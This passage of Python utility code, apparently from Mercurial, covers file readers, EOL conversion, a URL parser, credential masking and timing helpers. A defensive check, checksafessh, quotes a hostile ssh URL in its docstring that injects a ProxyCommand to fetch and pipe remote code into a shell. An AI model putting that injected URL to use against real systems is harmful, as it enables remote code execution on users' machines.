2325 2347 (default 131072) bytes at a time, up to optional limit (default is
2326 2348 to read all data). Chunks may be less than size bytes if the
2327 2349 chunk is the last chunk in the file, or the file is a socket or
2328 2350 some other type of file that sometimes reads less data than is
2329 2351 requested."""
2330 2352 assert size >= 0
2331 2353 assert limit is None or limit >= 0
2332 2354 while True:
2333 2355 if limit is None:
2334 2356 nbytes = size
2335 2357 else:
2336 2358 nbytes = min(limit, size)
2337 2359 s = nbytes and f.read(nbytes)
2338 2360 if not s:
2339 2361 break
2340 2362 if limit:
2341 2363 limit -= len(s)
2342 2364 yield s
2343 2365
2344 2366 class cappedreader(object):
2345 2367 """A file object proxy that allows reading up to N bytes.
2346 2368
2347 2369 Given a source file object, instances of this type allow reading up to
2348 2370 N bytes from that source file object. Attempts to read past the allowed
2349 2371 limit are treated as EOF.
2350 2372
2351 2373 It is assumed that I/O is not performed on the original file object
2352 2374 in addition to I/O that is performed by this instance. If there is,
2353 2375 state tracking will get out of sync and unexpected results will ensue.
2354 2376 """
2355 2377 def __init__(self, fh, limit):
2356 2378 """Allow reading up to <limit> bytes from <fh>."""
2357 2379 self._fh = fh
2358 2380 self._left = limit
2359 2381
2360 2382 def read(self, n=-1):
2361 2383 if not self._left:
2362 2384 return b''
2363 2385
2364 2386 if n < 0:
2365 2387 n = self._left
2366 2388
2367 2389 data = self._fh.read(min(n, self._left))
2368 2390 self._left -= len(data)
2369 2391 assert self._left >= 0
2370 2392
2371 2393 return data
2372 2394
2373 2395 def readinto(self, b):
2374 2396 res = self.read(len(b))
2375 2397 if res is None:
2376 2398 return None
2377 2399
2378 2400 b[0:len(res)] = res
2379 2401 return len(res)
2380 2402
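# Illustrative use (with a made-up in-memory file):
#
#   import io
#   reader = cappedreader(io.BytesIO(b'0123456789'), 4)
#   reader.read()  -> b'0123'
#   reader.read()  -> b''
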
2381 2403 def unitcountfn(*unittable):
2382 2404 '''return a function that renders a readable count of some quantity'''
2383 2405
2384 2406 def go(count):
2385 2407 for multiplier, divisor, format in unittable:
2386 2408 if abs(count) >= divisor * multiplier:
2387 2409 return format % (count / float(divisor))
2388 2410 return unittable[-1][2] % count
2389 2411
2390 2412 return go
2391 2413
2392 2414 def processlinerange(fromline, toline):
2393 2415 """Check that linerange <fromline>:<toline> makes sense and return a
2394 2416 0-based range.
2395 2417
2396 2418 >>> processlinerange(10, 20)
2397 2419 (9, 20)
2398 2420 >>> processlinerange(2, 1)
2399 2421 Traceback (most recent call last):
2400 2422 ...
2401 2423 ParseError: line range must be positive
2402 2424 >>> processlinerange(0, 5)
2403 2425 Traceback (most recent call last):
2404 2426 ...
2405 2427 ParseError: fromline must be strictly positive
2406 2428 """
2407 2429 if toline - fromline < 0:
2408 2430 raise error.ParseError(_("line range must be positive"))
2409 2431 if fromline < 1:
2410 2432 raise error.ParseError(_("fromline must be strictly positive"))
2411 2433 return fromline - 1, toline
2412 2434
2413 2435 bytecount = unitcountfn(
2414 2436 (100, 1 << 30, _('%.0f GB')),
2415 2437 (10, 1 << 30, _('%.1f GB')),
2416 2438 (1, 1 << 30, _('%.2f GB')),
2417 2439 (100, 1 << 20, _('%.0f MB')),
2418 2440 (10, 1 << 20, _('%.1f MB')),
2419 2441 (1, 1 << 20, _('%.2f MB')),
2420 2442 (100, 1 << 10, _('%.0f KB')),
2421 2443 (10, 1 << 10, _('%.1f KB')),
2422 2444 (1, 1 << 10, _('%.2f KB')),
2423 2445 (1, 1, _('%.0f bytes')),
2424 2446 )
2425 2447
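# For example: bytecount(2097152) -> '2.00 MB', since 2097152 bytes is
# exactly 2 * (1 << 20) and falls in the two-decimal MB bracket.
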
2426 2448 class transformingwriter(object):
2427 2449 """Writable file wrapper to transform data by function"""
2428 2450
2429 2451 def __init__(self, fp, encode):
2430 2452 self._fp = fp
2431 2453 self._encode = encode
2432 2454
2433 2455 def close(self):
2434 2456 self._fp.close()
2435 2457
2436 2458 def flush(self):
2437 2459 self._fp.flush()
2438 2460
2439 2461 def write(self, data):
2440 2462 return self._fp.write(self._encode(data))
2441 2463
2442 2464 # Matches a single EOL which can either be a CRLF where repeated CR
2443 2465 # are removed or a LF. We do not care about old Macintosh files, so a
2444 2466 # stray CR is an error.
2445 2467 _eolre = remod.compile(br'\r*\n')
2446 2468
2447 2469 def tolf(s):
2448 2470 return _eolre.sub('\n', s)
2449 2471
2450 2472 def tocrlf(s):
2451 2473 return _eolre.sub('\r\n', s)
2452 2474
2453 2475 def _crlfwriter(fp):
2454 2476 return transformingwriter(fp, tocrlf)
2455 2477
2456 2478 if pycompat.oslinesep == '\r\n':
2457 2479 tonativeeol = tocrlf
2458 2480 fromnativeeol = tolf
2459 2481 nativeeolwriter = _crlfwriter
2460 2482 else:
2461 2483 tonativeeol = pycompat.identity
2462 2484 fromnativeeol = pycompat.identity
2463 2485 nativeeolwriter = pycompat.identity
2464 2486
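# For example: tolf(b'a\r\nb\r\r\nc\n') -> b'a\nb\nc\n' (runs of CR
# before a LF collapse), and tocrlf() maps each LF back to CRLF.
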
2465 2487 if (pyplatform.python_implementation() == 'CPython' and
2466 2488 sys.version_info < (3, 0)):
2467 2489 # There is an issue in CPython where some IO methods do not handle EINTR
2468 2490 # correctly. The following table shows which CPython versions (and functions)
2469 2491 # are affected (buggy: has the EINTR bug, okay: otherwise):
2470 2492 #
2471 2493 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2472 2494 # --------------------------------------------------
2473 2495 # fp.__iter__ | buggy | buggy | okay
2474 2496 # fp.read* | buggy | okay [1] | okay
2475 2497 #
2476 2498 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2477 2499 #
2478 2500 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2479 2501 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2480 2502 #
2481 2503 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2482 2504 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2483 2505 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2484 2506 # fp.__iter__ but not other fp.read* methods.
2485 2507 #
2486 2508 # On modern systems like Linux, the "read" syscall cannot be interrupted
2487 2509 # when reading "fast" files like on-disk files. So the EINTR issue only
2488 2510 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2489 2511 # files approximately as "fast" files and use the fast (unsafe) code path,
2490 2512 # to minimize the performance impact.
2491 2513 if sys.version_info >= (2, 7, 4):
2492 2514 # fp.readline deals with EINTR correctly, use it as a workaround.
2493 2515 def _safeiterfile(fp):
2494 2516 return iter(fp.readline, '')
2495 2517 else:
2496 2518 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2497 2519 # note: this may block longer than necessary because of bufsize.
2498 2520 def _safeiterfile(fp, bufsize=4096):
2499 2521 fd = fp.fileno()
2500 2522 line = ''
2501 2523 while True:
2502 2524 try:
2503 2525 buf = os.read(fd, bufsize)
2504 2526 except OSError as ex:
2505 2527 # os.read only raises EINTR before any data is read
2506 2528 if ex.errno == errno.EINTR:
2507 2529 continue
2508 2530 else:
2509 2531 raise
2510 2532 line += buf
2511 2533 if '\n' in buf:
2512 2534 splitted = line.splitlines(True)
2513 2535 line = ''
2514 2536 for l in splitted:
2515 2537 if l[-1] == '\n':
2516 2538 yield l
2517 2539 else:
2518 2540 line = l
2519 2541 if not buf:
2520 2542 break
2521 2543 if line:
2522 2544 yield line
2523 2545
2524 2546 def iterfile(fp):
2525 2547 fastpath = True
2526 2548 if type(fp) is file:
2527 2549 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2528 2550 if fastpath:
2529 2551 return fp
2530 2552 else:
2531 2553 return _safeiterfile(fp)
2532 2554 else:
2533 2555 # PyPy and CPython 3 do not have the EINTR issue, so no workaround is needed.
2534 2556 def iterfile(fp):
2535 2557 return fp
2536 2558
2537 2559 def iterlines(iterator):
2538 2560 for chunk in iterator:
2539 2561 for line in chunk.splitlines():
2540 2562 yield line
2541 2563
2542 2564 def expandpath(path):
2543 2565 return os.path.expanduser(os.path.expandvars(path))
2544 2566
2545 2567 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2546 2568 """Return the result of interpolating items in the mapping into string s.
2547 2569
2548 2570 prefix is a single character string, or a two character string with
2549 2571 a backslash as the first character if the prefix needs to be escaped in
2550 2572 a regular expression.
2551 2573
2552 2574 fn is an optional function that will be applied to the replacement text
2553 2575 just before replacement.
2554 2576
2555 2577 escape_prefix is an optional flag that allows using doubled prefix for
2556 2578 its escaping.
2557 2579 """
2558 2580 fn = fn or (lambda s: s)
2559 2581 patterns = '|'.join(mapping.keys())
2560 2582 if escape_prefix:
2561 2583 patterns += '|' + prefix
2562 2584 if len(prefix) > 1:
2563 2585 prefix_char = prefix[1:]
2564 2586 else:
2565 2587 prefix_char = prefix
2566 2588 mapping[prefix_char] = prefix_char
2567 2589 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2568 2590 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2569 2591
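# For example (illustrative; '%' needs no regex escaping):
#
#   interpolate(b'%', {b'foo': b'bar'}, b'say %foo') -> b'say bar'
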
2570 2592 def getport(port):
2571 2593 """Return the port for a given network service.
2572 2594
2573 2595 If port is an integer, it's returned as is. If it's a string, it's
2574 2596 looked up using socket.getservbyname(). If there's no matching
2575 2597 service, error.Abort is raised.
2576 2598 """
2577 2599 try:
2578 2600 return int(port)
2579 2601 except ValueError:
2580 2602 pass
2581 2603
2582 2604 try:
2583 2605 return socket.getservbyname(pycompat.sysstr(port))
2584 2606 except socket.error:
2585 2607 raise error.Abort(_("no port number associated with service '%s'")
2586 2608 % port)
2587 2609
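# For example: getport(8080) and getport(b'8080') both return 8080,
# while getport(b'http') consults socket.getservbyname() and typically
# returns 80.
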
2588 2610 class url(object):
2589 2611 r"""Reliable URL parser.
2590 2612
2591 2613 This parses URLs and provides attributes for the following
2592 2614 components:
2593 2615
2594 2616 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2595 2617
2596 2618 Missing components are set to None. The only exception is
2597 2619 fragment, which is set to '' if present but empty.
2598 2620
2599 2621 If parsefragment is False, fragment is included in query. If
2600 2622 parsequery is False, query is included in path. If both are
2601 2623 False, both fragment and query are included in path.
2602 2624
2603 2625 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2604 2626
2605 2627 Note that for backward compatibility reasons, bundle URLs do not
2606 2628 take host names. That means 'bundle://../' has a path of '../'.
2607 2629
2608 2630 Examples:
2609 2631
2610 2632 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2611 2633 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2612 2634 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2613 2635 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2614 2636 >>> url(b'file:///home/joe/repo')
2615 2637 <url scheme: 'file', path: '/home/joe/repo'>
2616 2638 >>> url(b'file:///c:/temp/foo/')
2617 2639 <url scheme: 'file', path: 'c:/temp/foo/'>
2618 2640 >>> url(b'bundle:foo')
2619 2641 <url scheme: 'bundle', path: 'foo'>
2620 2642 >>> url(b'bundle://../foo')
2621 2643 <url scheme: 'bundle', path: '../foo'>
2622 2644 >>> url(br'c:\foo\bar')
2623 2645 <url path: 'c:\\foo\\bar'>
2624 2646 >>> url(br'\\blah\blah\blah')
2625 2647 <url path: '\\\\blah\\blah\\blah'>
2626 2648 >>> url(br'\\blah\blah\blah#baz')
2627 2649 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2628 2650 >>> url(br'file:///C:\users\me')
2629 2651 <url scheme: 'file', path: 'C:\\users\\me'>
2630 2652
2631 2653 Authentication credentials:
2632 2654
2633 2655 >>> url(b'ssh://joe:xyz@x/repo')
2634 2656 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2635 2657 >>> url(b'ssh://joe@x/repo')
2636 2658 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2637 2659
2638 2660 Query strings and fragments:
2639 2661
2640 2662 >>> url(b'http://host/a?b#c')
2641 2663 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2642 2664 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2643 2665 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2644 2666
2645 2667 Empty path:
2646 2668
2647 2669 >>> url(b'')
2648 2670 <url path: ''>
2649 2671 >>> url(b'#a')
2650 2672 <url path: '', fragment: 'a'>
2651 2673 >>> url(b'http://host/')
2652 2674 <url scheme: 'http', host: 'host', path: ''>
2653 2675 >>> url(b'http://host/#a')
2654 2676 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2655 2677
2656 2678 Only scheme:
2657 2679
2658 2680 >>> url(b'http:')
2659 2681 <url scheme: 'http'>
2660 2682 """
2661 2683
2662 2684 _safechars = "!~*'()+"
2663 2685 _safepchars = "/!~*'()+:\\"
2664 2686 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2665 2687
2666 2688 def __init__(self, path, parsequery=True, parsefragment=True):
2667 2689 # We slowly chomp away at path until we have only the path left
2668 2690 self.scheme = self.user = self.passwd = self.host = None
2669 2691 self.port = self.path = self.query = self.fragment = None
2670 2692 self._localpath = True
2671 2693 self._hostport = ''
2672 2694 self._origpath = path
2673 2695
2674 2696 if parsefragment and '#' in path:
2675 2697 path, self.fragment = path.split('#', 1)
2676 2698
2677 2699 # special case for Windows drive letters and UNC paths
2678 2700 if hasdriveletter(path) or path.startswith('\\\\'):
2679 2701 self.path = path
2680 2702 return
2681 2703
2682 2704 # For compatibility reasons, we can't handle bundle paths as
2683 2705 # normal URLS
2684 2706 if path.startswith('bundle:'):
2685 2707 self.scheme = 'bundle'
2686 2708 path = path[7:]
2687 2709 if path.startswith('//'):
2688 2710 path = path[2:]
2689 2711 self.path = path
2690 2712 return
2691 2713
2692 2714 if self._matchscheme(path):
2693 2715 parts = path.split(':', 1)
2694 2716 if parts[0]:
2695 2717 self.scheme, path = parts
2696 2718 self._localpath = False
2697 2719
2698 2720 if not path:
2699 2721 path = None
2700 2722 if self._localpath:
2701 2723 self.path = ''
2702 2724 return
2703 2725 else:
2704 2726 if self._localpath:
2705 2727 self.path = path
2706 2728 return
2707 2729
2708 2730 if parsequery and '?' in path:
2709 2731 path, self.query = path.split('?', 1)
2710 2732 if not path:
2711 2733 path = None
2712 2734 if not self.query:
2713 2735 self.query = None
2714 2736
2715 2737 # // is required to specify a host/authority
2716 2738 if path and path.startswith('//'):
2717 2739 parts = path[2:].split('/', 1)
2718 2740 if len(parts) > 1:
2719 2741 self.host, path = parts
2720 2742 else:
2721 2743 self.host = parts[0]
2722 2744 path = None
2723 2745 if not self.host:
2724 2746 self.host = None
2725 2747 # path of file:///d is /d
2726 2748 # path of file:///d:/ is d:/, not /d:/
2727 2749 if path and not hasdriveletter(path):
2728 2750 path = '/' + path
2729 2751
2730 2752 if self.host and '@' in self.host:
2731 2753 self.user, self.host = self.host.rsplit('@', 1)
2732 2754 if ':' in self.user:
2733 2755 self.user, self.passwd = self.user.split(':', 1)
2734 2756 if not self.host:
2735 2757 self.host = None
2736 2758
2737 2759 # Don't split on colons in IPv6 addresses without ports
2738 2760 if (self.host and ':' in self.host and
2739 2761 not (self.host.startswith('[') and self.host.endswith(']'))):
2740 2762 self._hostport = self.host
2741 2763 self.host, self.port = self.host.rsplit(':', 1)
2742 2764 if not self.host:
2743 2765 self.host = None
2744 2766
2745 2767 if (self.host and self.scheme == 'file' and
2746 2768 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2747 2769 raise error.Abort(_('file:// URLs can only refer to localhost'))
2748 2770
2749 2771 self.path = path
2750 2772
2751 2773 # leave the query string escaped
2752 2774 for a in ('user', 'passwd', 'host', 'port',
2753 2775 'path', 'fragment'):
2754 2776 v = getattr(self, a)
2755 2777 if v is not None:
2756 2778 setattr(self, a, urlreq.unquote(v))
2757 2779
2758 2780 @encoding.strmethod
2759 2781 def __repr__(self):
2760 2782 attrs = []
2761 2783 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2762 2784 'query', 'fragment'):
2763 2785 v = getattr(self, a)
2764 2786 if v is not None:
2765 2787 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2766 2788 return '<url %s>' % ', '.join(attrs)
2767 2789
2768 2790 def __bytes__(self):
2769 2791 r"""Join the URL's components back into a URL string.
2770 2792
2771 2793 Examples:
2772 2794
2773 2795 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2774 2796 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2775 2797 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2776 2798 'http://user:pw@host:80/?foo=bar&baz=42'
2777 2799 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2778 2800 'http://user:pw@host:80/?foo=bar%3dbaz'
2779 2801 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2780 2802 'ssh://user:pw@[::1]:2200//home/joe#'
2781 2803 >>> bytes(url(b'http://localhost:80//'))
2782 2804 'http://localhost:80//'
2783 2805 >>> bytes(url(b'http://localhost:80/'))
2784 2806 'http://localhost:80/'
2785 2807 >>> bytes(url(b'http://localhost:80'))
2786 2808 'http://localhost:80/'
2787 2809 >>> bytes(url(b'bundle:foo'))
2788 2810 'bundle:foo'
2789 2811 >>> bytes(url(b'bundle://../foo'))
2790 2812 'bundle:../foo'
2791 2813 >>> bytes(url(b'path'))
2792 2814 'path'
2793 2815 >>> bytes(url(b'file:///tmp/foo/bar'))
2794 2816 'file:///tmp/foo/bar'
2795 2817 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2796 2818 'file:///c:/tmp/foo/bar'
2797 2819 >>> print(url(br'bundle:foo\bar'))
2798 2820 bundle:foo\bar
2799 2821 >>> print(url(br'file:///D:\data\hg'))
2800 2822 file:///D:\data\hg
2801 2823 """
2802 2824 if self._localpath:
2803 2825 s = self.path
2804 2826 if self.scheme == 'bundle':
2805 2827 s = 'bundle:' + s
2806 2828 if self.fragment:
2807 2829 s += '#' + self.fragment
2808 2830 return s
2809 2831
2810 2832 s = self.scheme + ':'
2811 2833 if self.user or self.passwd or self.host:
2812 2834 s += '//'
2813 2835 elif self.scheme and (not self.path or self.path.startswith('/')
2814 2836 or hasdriveletter(self.path)):
2815 2837 s += '//'
2816 2838 if hasdriveletter(self.path):
2817 2839 s += '/'
2818 2840 if self.user:
2819 2841 s += urlreq.quote(self.user, safe=self._safechars)
2820 2842 if self.passwd:
2821 2843 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2822 2844 if self.user or self.passwd:
2823 2845 s += '@'
2824 2846 if self.host:
2825 2847 if not (self.host.startswith('[') and self.host.endswith(']')):
2826 2848 s += urlreq.quote(self.host)
2827 2849 else:
2828 2850 s += self.host
2829 2851 if self.port:
2830 2852 s += ':' + urlreq.quote(self.port)
2831 2853 if self.host:
2832 2854 s += '/'
2833 2855 if self.path:
2834 2856 # TODO: similar to the query string, we should not unescape the
2835 2857 # path when we store it, the path might contain '%2f' = '/',
2836 2858 # which we should *not* escape.
2837 2859 s += urlreq.quote(self.path, safe=self._safepchars)
2838 2860 if self.query:
2839 2861 # we store the query in escaped form.
2840 2862 s += '?' + self.query
2841 2863 if self.fragment is not None:
2842 2864 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2843 2865 return s
2844 2866
2845 2867 __str__ = encoding.strmethod(__bytes__)
2846 2868
2847 2869 def authinfo(self):
2848 2870 user, passwd = self.user, self.passwd
2849 2871 try:
2850 2872 self.user, self.passwd = None, None
2851 2873 s = bytes(self)
2852 2874 finally:
2853 2875 self.user, self.passwd = user, passwd
2854 2876 if not self.user:
2855 2877 return (s, None)
2856 2878 # authinfo[1] is passed to urllib2 password manager, and its
2857 2879 # URIs must not contain credentials. The host is passed in the
2858 2880 # URIs list because Python < 2.4.3 uses only that to search for
2859 2881 # a password.
2860 2882 return (s, (None, (s, self.host),
2861 2883 self.user, self.passwd or ''))
2862 2884
2863 2885 def isabs(self):
2864 2886 if self.scheme and self.scheme != 'file':
2865 2887 return True # remote URL
2866 2888 if hasdriveletter(self.path):
2867 2889 return True # absolute for our purposes - can't be joined()
2868 2890 if self.path.startswith(br'\\'):
2869 2891 return True # Windows UNC path
2870 2892 if self.path.startswith('/'):
2871 2893 return True # POSIX-style
2872 2894 return False
2873 2895
2874 2896 def localpath(self):
2875 2897 if self.scheme == 'file' or self.scheme == 'bundle':
2876 2898 path = self.path or '/'
2877 2899 # For Windows, we need to promote hosts containing drive
2878 2900 # letters to paths with drive letters.
2879 2901 if hasdriveletter(self._hostport):
2880 2902 path = self._hostport + '/' + self.path
2881 2903 elif (self.host is not None and self.path
2882 2904 and not hasdriveletter(path)):
2883 2905 path = '/' + path
2884 2906 return path
2885 2907 return self._origpath
2886 2908
2887 2909 def islocal(self):
2888 2910 '''whether localpath will return something that posixfile can open'''
2889 2911 return (not self.scheme or self.scheme == 'file'
2890 2912 or self.scheme == 'bundle')
2891 2913
2892 2914 def hasscheme(path):
2893 2915 return bool(url(path).scheme)
2894 2916
2895 2917 def hasdriveletter(path):
2896 2918 return path and path[1:2] == ':' and path[0:1].isalpha()
2897 2919
2898 2920 def urllocalpath(path):
2899 2921 return url(path, parsequery=False, parsefragment=False).localpath()
2900 2922
2901 2923 def checksafessh(path):
2902 2924 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2903 2925
2904 2926 This is a sanity check for ssh urls. ssh will parse the first item as
2905 2927 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2906 2928 Let's prevent these potentially exploitable urls entirely and warn the
2907 2929 user.
2908 2930
2909 2931 Raises an error.Abort when the url is unsafe.
2910 2932 """
2911 2933 path = urlreq.unquote(path)
2912 2934 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2913 2935 raise error.Abort(_('potentially unsafe url: %r') %
2914 2936 (pycompat.bytestr(path),))
2915 2937
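A brief hedged sketch of the guard above; both URLs are made up:

    checksafessh(b'ssh://example.com/repo')  # fine; returns None
    try:
        checksafessh(b'ssh://-oProxyCommand=evil/repo')
    except error.Abort:
        pass  # rejected: ssh would parse the host as a command-line option
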
2916 2938 def hidepassword(u):
2917 2939 '''hide user credential in a url string'''
2918 2940 u = url(u)
2919 2941 if u.passwd:
2920 2942 u.passwd = '***'
2921 2943 return bytes(u)
2922 2944
2923 2945 def removeauth(u):
2924 2946 '''remove all authentication information from a url string'''
2925 2947 u = url(u)
2926 2948 u.user = u.passwd = None
2927 2949 return bytes(u)
2928 2950
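For illustration (values hypothetical), the two helpers differ only in whether the user name survives:

    hidepassword(b'http://alice:secret@example.com/repo')
    # -> 'http://alice:***@example.com/repo'
    removeauth(b'http://alice:secret@example.com/repo')
    # -> 'http://example.com/repo'
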
2929 2951 timecount = unitcountfn(
2930 2952 (1, 1e3, _('%.0f s')),
2931 2953 (100, 1, _('%.1f s')),
2932 2954 (10, 1, _('%.2f s')),
2933 2955 (1, 1, _('%.3f s')),
2934 2956 (100, 0.001, _('%.1f ms')),
2935 2957 (10, 0.001, _('%.2f ms')),
2936 2958 (1, 0.001, _('%.3f ms')),
2937 2959 (100, 0.000001, _('%.1f us')),
2938 2960 (10, 0.000001, _('%.2f us')),
2939 2961 (1, 0.000001, _('%.3f us')),
2940 2962 (100, 0.000000001, _('%.1f ns')),
2941 2963 (10, 0.000000001, _('%.2f ns')),
2942 2964 (1, 0.000000001, _('%.3f ns')),
2943 2965 )
2944 2966
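The tiers above select the first (multiplier, divisor) row whose threshold the value reaches, keeping roughly three significant digits; a few hedged examples of the resulting strings:

    timecount(1.5)       # -> '1.500 s'
    timecount(0.25)      # -> '250.0 ms'
    timecount(0.000123)  # -> '123.0 us'
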
2945 2967 @attr.s
2946 2968 class timedcmstats(object):
2947 2969 """Stats information produced by the timedcm context manager on entering."""
2948 2970
2949 2971 # the starting value of the timer as a float (meaning and resolution are
2950 2972 # platform dependent, see util.timer)
2951 2973 start = attr.ib(default=attr.Factory(lambda: timer()))
2952 2974 # the number of seconds as a floating point value; starts at 0, updated when
2953 2975 # the context is exited.
2954 2976 elapsed = attr.ib(default=0)
2955 2977 # the number of nested timedcm context managers.
2956 2978 level = attr.ib(default=1)
2957 2979
2958 2980 def __bytes__(self):
2959 2981 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2960 2982
2961 2983 __str__ = encoding.strmethod(__bytes__)
2962 2984
2963 2985 @contextlib.contextmanager
2964 2986 def timedcm(whencefmt, *whenceargs):
2965 2987 """A context manager that produces timing information for a given context.
2966 2988
2967 2989 On entering, a timedcmstats instance is produced.
2968 2990
2969 2991 This context manager is reentrant.
2970 2992
2971 2993 """
2972 2994 # track nested context managers
2973 2995 timedcm._nested += 1
2974 2996 timing_stats = timedcmstats(level=timedcm._nested)
2975 2997 try:
2976 2998 with tracing.log(whencefmt, *whenceargs):
2977 2999 yield timing_stats
2978 3000 finally:
2979 3001 timing_stats.elapsed = timer() - timing_stats.start
2980 3002 timedcm._nested -= 1
2981 3003
2982 3004 timedcm._nested = 0
2983 3005
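A minimal usage sketch, assuming a hypothetical workload function:

    with timedcm(b'loading %s', b'manifest') as stats:
        load_manifest()  # hypothetical expensive call
    # stats.elapsed is now populated; bytes(stats) renders e.g. '1.234 ms'
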
2984 3006 def timed(func):
2985 3007 '''Report the execution time of a function call to stderr.
2986 3008
2987 3009 During development, use as a decorator when you need to measure
2988 3010 the cost of a function, e.g. as follows:
2989 3011
2990 3012 @util.timed
2991 3013 def foo(a, b, c):
2992 3014 pass
2993 3015 '''
2994 3016
2995 3017 def wrapper(*args, **kwargs):
2996 3018 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2997 3019 result = func(*args, **kwargs)
2998 3020 stderr = procutil.stderr
2999 3021 stderr.write('%s%s: %s\n' % (
3000 3022 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3001 3023 time_stats))
3002 3024 return result
3003 3025 return wrapper
3004 3026
3005 3027 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3006 3028 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3007 3029
3008 3030 def sizetoint(s):
3009 3031 '''Convert a space specifier to a byte count.
3010 3032
3011 3033 >>> sizetoint(b'30')
3012 3034 30
3013 3035 >>> sizetoint(b'2.2kb')
3014 3036 2252
3015 3037 >>> sizetoint(b'6M')
3016 3038 6291456
3017 3039 '''
3018 3040 t = s.strip().lower()
3019 3041 try:
3020 3042 for k, u in _sizeunits:
3021 3043 if t.endswith(k):
3022 3044 return int(float(t[:-len(k)]) * u)
3023 3045 return int(t)
3024 3046 except ValueError:
3025 3047 raise error.ParseError(_("couldn't parse size: %s") % s)
3026 3048
3027 3049 class hooks(object):
3028 3050 '''A collection of hook functions that can be used to extend a
3029 3051 function's behavior. Hooks are called in lexicographic order,
3030 3052 based on the names of their sources.'''
3031 3053
3032 3054 def __init__(self):
3033 3055 self._hooks = []
3034 3056
3035 3057 def add(self, source, hook):
3036 3058 self._hooks.append((source, hook))
3037 3059
3038 3060 def __call__(self, *args):
3039 3061 self._hooks.sort(key=lambda x: x[0])
3040 3062 results = []
3041 3063 for source, hook in self._hooks:
3042 3064 results.append(hook(*args))
3043 3065 return results
3044 3066
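Because hooks are sorted by source name, registration order does not matter; a hedged sketch:

    h = hooks()
    h.add('zzz-ext', lambda v: v * 2)
    h.add('aaa-ext', lambda v: v + 1)
    h(10)  # -> [11, 20]: 'aaa-ext' runs before 'zzz-ext'
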
3045 3067 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3046 3068 '''Yields lines for a nicely formatted stacktrace.
3047 3069 Skips the 'skip' last entries, then returns the last 'depth' entries.
3048 3070 Each file+linenumber is formatted according to fileline.
3049 3071 Each line is formatted according to line.
3050 3072 If line is None, it yields:
3051 3073 length of longest filepath+line number,
3052 3074 filepath+linenumber,
3053 3075 function
3054 3076
3055 3077 Not to be used in production code, but very convenient while developing.
3056 3078 '''
3057 3079 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3058 3080 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3059 3081 ][-depth:]
3060 3082 if entries:
3061 3083 fnmax = max(len(entry[0]) for entry in entries)
3062 3084 for fnln, func in entries:
3063 3085 if line is None:
3064 3086 yield (fnmax, fnln, func)
3065 3087 else:
3066 3088 yield line % (fnmax, fnln, func)
3067 3089
3068 3090 def debugstacktrace(msg='stacktrace', skip=0,
3069 3091 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3070 3092 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3071 3093 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3072 3094 By default it will flush stdout first.
3073 3095 It can be used everywhere and intentionally does not require an ui object.
3074 3096 Not to be used in production code, but very convenient while developing.
3075 3097 '''
3076 3098 if otherf:
3077 3099 otherf.flush()
3078 3100 f.write('%s at:\n' % msg.rstrip())
3079 3101 for line in getstackframes(skip + 1, depth=depth):
3080 3102 f.write(line)
3081 3103 f.flush()
3082 3104
3083 3105 class dirs(object):
3084 3106 '''a multiset of directory names from a dirstate or manifest'''
3085 3107
3086 3108 def __init__(self, map, skip=None):
3087 3109 self._dirs = {}
3088 3110 addpath = self.addpath
3089 3111 if safehasattr(map, 'iteritems') and skip is not None:
3090 3112 for f, s in map.iteritems():
3091 3113 if s[0] != skip:
3092 3114 addpath(f)
3093 3115 else:
3094 3116 for f in map:
3095 3117 addpath(f)
3096 3118
3097 3119 def addpath(self, path):
